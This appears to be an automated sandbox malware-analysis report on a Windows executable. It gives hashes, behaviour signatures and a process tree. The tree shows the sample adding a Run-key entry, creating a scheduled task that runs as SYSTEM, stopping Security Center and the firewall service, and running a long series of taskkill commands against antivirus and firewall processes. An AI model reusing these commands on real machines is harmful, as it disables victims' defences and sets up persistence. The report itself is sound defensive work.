Analysis
-
max time kernel
140s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 11:56
Static task
static1
Behavioral task
behavioral1
Sample
b4a4151a520a3b7ce08689f35c77c0b6.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b4a4151a520a3b7ce08689f35c77c0b6.exe
Resource
win10v2004-20240226-en
General
-
Target
b4a4151a520a3b7ce08689f35c77c0b6.exe
-
Size
1.4MB
-
MD5
b4a4151a520a3b7ce08689f35c77c0b6
-
SHA1
34be9a7b061f45672e9e8f23b9085cd6033986e6
-
SHA256
c75380f0a71693379115d2e9199e74fc71298c2fa5f9de2dee521a24338445d7
-
SHA512
c35b20bb8758c4fc73767ba6a5ad85e58426ba78795af0eccdb7bdf84b240bc1b852b936de8587a71bbb38086461b2c841900f042be1716b5bf8bd2d3424fe84
-
SSDEEP
24576:gJnQnj7ckZcNHiUpRkjnQ2vZx+3hHNjIGOhycO9S7fdrS4zwnop6rDcJD8WPt:yQj71Z/lnQ2RE3htkFO9afdrVSopIoJt
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Wapp = "C:\\Arquivos de programas\\Wapp.exe" b4a4151a520a3b7ce08689f35c77c0b6.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2720 schtasks.exe -
Kills process with taskkill 64 IoCs
pid Process 2908 taskkill.exe 2740 taskkill.exe 2188 taskkill.exe 324 taskkill.exe 2556 taskkill.exe 2400 taskkill.exe 1800 taskkill.exe 2288 taskkill.exe 2568 taskkill.exe 1884 taskkill.exe 2516 taskkill.exe 2932 taskkill.exe 572 taskkill.exe 1640 taskkill.exe 2820 taskkill.exe 2848 taskkill.exe 1568 taskkill.exe 1144 taskkill.exe 892 taskkill.exe 864 taskkill.exe 540 taskkill.exe 2736 taskkill.exe 1404 taskkill.exe 2020 taskkill.exe 1248 taskkill.exe 3020 taskkill.exe 324 taskkill.exe 2208 taskkill.exe 2720 taskkill.exe 2164 taskkill.exe 2548 taskkill.exe 1184 taskkill.exe 1316 taskkill.exe 2588 taskkill.exe 2668 taskkill.exe 2060 taskkill.exe 2304 taskkill.exe 1700 taskkill.exe 1596 taskkill.exe 2788 taskkill.exe 348 taskkill.exe 1984 taskkill.exe 1680 taskkill.exe 2300 taskkill.exe 2432 taskkill.exe 2492 taskkill.exe 2332 taskkill.exe 1184 taskkill.exe 2268 taskkill.exe 1984 taskkill.exe 1704 taskkill.exe 2384 taskkill.exe 2500 taskkill.exe 2936 taskkill.exe 1624 taskkill.exe 2672 taskkill.exe 2632 taskkill.exe 2840 taskkill.exe 1316 taskkill.exe 2720 taskkill.exe 2668 taskkill.exe 2148 taskkill.exe 2800 taskkill.exe 2788 taskkill.exe -
Runs net.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 2684 taskkill.exe Token: SeDebugPrivilege 2672 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 2492 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 2668 taskkill.exe Token: SeDebugPrivilege 2640 taskkill.exe Token: SeDebugPrivilege 2724 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 2092 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeDebugPrivilege 2352 taskkill.exe Token: SeDebugPrivilege 2468 taskkill.exe Token: SeDebugPrivilege 540 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 1404 taskkill.exe Token: SeDebugPrivilege 572 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 832 taskkill.exe Token: SeDebugPrivilege 3064 taskkill.exe Token: SeDebugPrivilege 3056 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 1248 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1048 taskkill.exe Token: SeDebugPrivilege 628 taskkill.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 1232 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 892 taskkill.exe Token: SeDebugPrivilege 2932 taskkill.exe Token: SeDebugPrivilege 2500 taskkill.exe Token: SeDebugPrivilege 2568 taskkill.exe Token: SeDebugPrivilege 2604 taskkill.exe Token: SeDebugPrivilege 1444 taskkill.exe Token: SeDebugPrivilege 2952 taskkill.exe Token: SeDebugPrivilege 2332 taskkill.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeDebugPrivilege 2436 taskkill.exe Token: SeDebugPrivilege 2324 taskkill.exe Token: SeDebugPrivilege 2072 taskkill.exe Token: SeDebugPrivilege 2432 taskkill.exe Token: SeDebugPrivilege 2616 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 2756 taskkill.exe Token: SeDebugPrivilege 348 taskkill.exe Token: SeDebugPrivilege 2736 taskkill.exe Token: SeDebugPrivilege 1320 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 2284 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2720 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 28 PID 2100 wrote to memory of 2720 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 28 PID 2100 wrote to memory of 2720 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 28 PID 2100 wrote to memory of 2720 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 28 PID 2100 wrote to memory of 2192 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 30 PID 2100 wrote to memory of 2192 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 30 PID 2100 wrote to memory of 2192 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 30 PID 2100 wrote to memory of 2192 2100 b4a4151a520a3b7ce08689f35c77c0b6.exe 30 PID 2192 wrote to memory of 2596 2192 cmd.exe 32 PID 2192 wrote to memory of 2596 2192 cmd.exe 32 PID 2192 wrote to memory of 2596 2192 cmd.exe 32 PID 2192 wrote to memory of 2596 2192 cmd.exe 32 PID 2596 wrote to memory of 2608 2596 net.exe 33 PID 2596 wrote to memory of 2608 2596 net.exe 33 PID 2596 wrote to memory of 2608 2596 net.exe 33 PID 2596 wrote to memory of 2608 2596 net.exe 33 PID 2192 wrote to memory of 2560 2192 cmd.exe 34 PID 2192 wrote to memory of 2560 2192 cmd.exe 34 PID 2192 wrote to memory of 2560 2192 cmd.exe 34 PID 2192 wrote to memory of 2560 2192 cmd.exe 34 PID 2560 wrote to memory of 2528 2560 net.exe 35 PID 2560 wrote to memory of 2528 2560 net.exe 35 PID 2560 wrote to memory of 2528 2560 net.exe 35 PID 2560 wrote to memory of 2528 2560 net.exe 35 PID 2192 wrote to memory of 2496 2192 cmd.exe 36 PID 2192 wrote to memory of 2496 2192 cmd.exe 36 PID 2192 wrote to memory of 2496 2192 cmd.exe 36 PID 2192 wrote to memory of 2496 2192 cmd.exe 36 PID 2192 wrote to memory of 2788 2192 cmd.exe 38 PID 2192 wrote to memory of 2788 2192 cmd.exe 38 PID 2192 wrote to memory of 2788 2192 cmd.exe 38 PID 2192 wrote to memory of 2788 2192 cmd.exe 38 PID 2192 wrote to memory of 2684 2192 cmd.exe 39 PID 2192 wrote to memory of 2684 2192 cmd.exe 39 PID 2192 wrote to memory of 2684 2192 cmd.exe 39 PID 2192 wrote to memory of 2684 2192 cmd.exe 39 PID 2192 wrote to memory of 2672 2192 cmd.exe 40 PID 2192 wrote to memory of 2672 2192 cmd.exe 40 PID 2192 wrote to memory of 2672 2192 cmd.exe 40 PID 2192 wrote to memory of 2672 2192 cmd.exe 40 PID 2192 wrote to memory of 2392 2192 cmd.exe 41 PID 2192 wrote to memory of 2392 2192 cmd.exe 41 PID 2192 wrote to memory of 2392 2192 cmd.exe 41 PID 2192 wrote to memory of 2392 2192 cmd.exe 41 PID 2192 wrote to memory of 2492 2192 cmd.exe 42 PID 2192 wrote to memory of 2492 2192 cmd.exe 42 PID 2192 wrote to memory of 2492 2192 cmd.exe 42 PID 2192 wrote to memory of 2492 2192 cmd.exe 42 PID 2192 wrote to memory of 2956 2192 cmd.exe 43 PID 2192 wrote to memory of 2956 2192 cmd.exe 43 PID 2192 wrote to memory of 2956 2192 cmd.exe 43 PID 2192 wrote to memory of 2956 2192 cmd.exe 43 PID 2192 wrote to memory of 2928 2192 cmd.exe 44 PID 2192 wrote to memory of 2928 2192 cmd.exe 44 PID 2192 wrote to memory of 2928 2192 cmd.exe 44 PID 2192 wrote to memory of 2928 2192 cmd.exe 44 PID 2192 wrote to memory of 2668 2192 cmd.exe 45 PID 2192 wrote to memory of 2668 2192 cmd.exe 45 PID 2192 wrote to memory of 2668 2192 cmd.exe 45 PID 2192 wrote to memory of 2668 2192 cmd.exe 45 PID 2192 wrote to memory of 2640 2192 cmd.exe 46 PID 2192 wrote to memory of 2640 2192 cmd.exe 46 PID 2192 wrote to memory of 2640 2192 cmd.exe 46 PID 2192 wrote to memory of 2640 2192 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4a4151a520a3b7ce08689f35c77c0b6.exe"C:\Users\Admin\AppData\Local\Temp\b4a4151a520a3b7ce08689f35c77c0b6.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn startt /tr c:\autoexec.bat /sc onstart /ru system2⤵
- Creates scheduled task(s)
PID:2720
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\mata.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\net.exenet stop Security Center3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Security Center4⤵PID:2608
-
-
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:2528
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgas.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32krn.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kav.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kavmm.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgemc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgamsvr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgupsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashwebsv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashdisp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashmaisv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashserv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashwebsv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aswupdsv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ewidoctrl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guard.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gcasdtserv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msmpeng.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcafee.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghml.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msiexec.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outpost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isafe.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im minilog.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlclient.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im updclient.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navw32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navapsvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccsetmgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cccproxy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccevtmgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfmntor.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im logexprt.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisum.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im issvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpdclnt.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavprsrv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavprot.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avengine.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe3⤵PID:1572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webproxy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avguard.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgnt.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im shed.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sccomm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spiderml.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sgmain.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spywareguard.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kpf4gui.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kpf4ss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcdash.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcdetect.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcregwiz.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcinfo.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghtml.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oasclnt.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfagent.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfconsole.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfservice.exe3⤵PID:2304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpftray.exe3⤵PID:1756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfwizard.exe3⤵PID:1872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mvtx.exe3⤵PID:1020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avp32.exe3⤵PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avpcc.exe3⤵PID:2164
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avpm.exe3⤵PID:2352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ackwin32.exe3⤵PID:2468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im advxdwin.exe3⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agentsvr.exe3⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agv.exe3⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ahnsd.exe3⤵
- Kills process with taskkill
PID:1404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im alertsvc.exe3⤵
- Kills process with taskkill
PID:572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im alogserv.exe3⤵PID:2876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amon.exe3⤵PID:2344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amon9x.exe3⤵PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amonavp32.exe3⤵
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im anti -trojan.exe3⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antivir.exe3⤵
- Kills process with taskkill
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antivirus.exe3⤵PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ants.exe3⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antssircam.exe3⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apimonitor.exe3⤵PID:2156
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aplica32.exe3⤵PID:1148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe3⤵
- Kills process with taskkill
PID:2148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atcon.exe3⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atguard.exe3⤵
- Kills process with taskkill
PID:2820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ats.exe3⤵PID:276
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atscan.exe3⤵PID:1876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atupdater.exe3⤵PID:2248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atwatch.exe3⤵PID:2588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autodown.exe3⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autotrace.exe3⤵
- Kills process with taskkill
PID:2556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autoupdate.exe3⤵PID:2964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avconsol.exe3⤵PID:2516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ave32.exe3⤵PID:2688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc32.exe3⤵
- Kills process with taskkill
PID:2400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgctrl.exe3⤵PID:2484
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv.exe3⤵PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv9.exe3⤵PID:2404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv9schedapp.exe3⤵PID:2540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe3⤵PID:2996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkpop.exe3⤵PID:1868
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkserv.exe3⤵
- Kills process with taskkill
PID:2548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkservice.exe3⤵PID:2632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkwcl9.exe3⤵PID:2740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkwctl9.exe3⤵PID:2712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avnt.exe3⤵PID:996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avp.exe3⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avp32.exe3⤵PID:2040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpcc.exe3⤵PID:1852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AVPCC Service.exe3⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpccavpm.exe3⤵PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpdos32.exe3⤵PID:1376
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpexec.exe3⤵PID:2636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpinst.exe3⤵PID:2212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpm.exe3⤵
- Kills process with taskkill
PID:2848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpmonitor.exe3⤵PID:1344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avptc.exe3⤵PID:688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avptc32.exe3⤵PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpupd.exe3⤵PID:1408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpupdates.exe3⤵PID:1400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avrescue.exe3⤵PID:1708
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe3⤵PID:1848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsynmgr.exe3⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwin95.exe3⤵PID:2172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwinnt.exe3⤵PID:3012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwupd32.exe3⤵PID:3020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxgui.exe3⤵PID:1216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxinit.exe3⤵PID:684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxlive.exe3⤵PID:1252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxmonitor9x.exe3⤵PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxmonitornt.exe3⤵PID:932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxnews.exe3⤵
- Kills process with taskkill
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxquar.exe3⤵PID:836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxsch.exe3⤵PID:2868
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxw.exe3⤵PID:2232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BACKLOG.exe3⤵PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bd_professional.exe3⤵
- Kills process with taskkill
PID:2936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bidef.exe3⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bidserver.exe3⤵PID:2328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bipcp.exe3⤵PID:2932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bisp.exe3⤵PID:3048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackd.exe3⤵PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackice.exe3⤵PID:2500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackiceblackd.exe3⤵
- Kills process with taskkill
PID:2208
-
